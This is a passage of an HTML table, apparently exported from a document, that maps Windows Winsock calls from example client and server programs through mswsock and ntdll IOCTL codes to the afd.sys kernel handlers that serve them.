<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSASocketW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!socket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12003)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12007)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockDoConnectReal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdCreate</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtCreateFile (\Device\Afd\Endpoint)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSocket</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12010)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">03 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockPostProcessConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!SockDoConnectReal</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 mswsock!SockDoConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 mswsock!WSPConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">06 WS2_32!connect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 ClientExample!Client::Start</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12037)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockCoreAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">04 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdDispatchImmediateIrp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12047)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!SockSetHandleContext</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 mswsock!SockCoreAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 mswsock!WSPAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 WS2_32!WSAAccept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">05 WS2_32!accept</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastIoDeviceControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL - 12017)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPRecv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!recv</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ServerExample!main</span></div>
</td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><br /></td><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00 ntdll!NtDeviceIoControlFile (IOCTL – 1201F)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 mswsock!WSPSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">02 WS2_32!send</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ClientExample!Client::Send</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 ClientExample!main</span></div>
</td></tr>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 0.5pt; border-left: solid #000000 0.5pt; border-right: solid #000000 0.5pt; border-top: solid #000000 0.5pt; padding: 0pt 5.4pt 0pt 5.4pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdFastConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
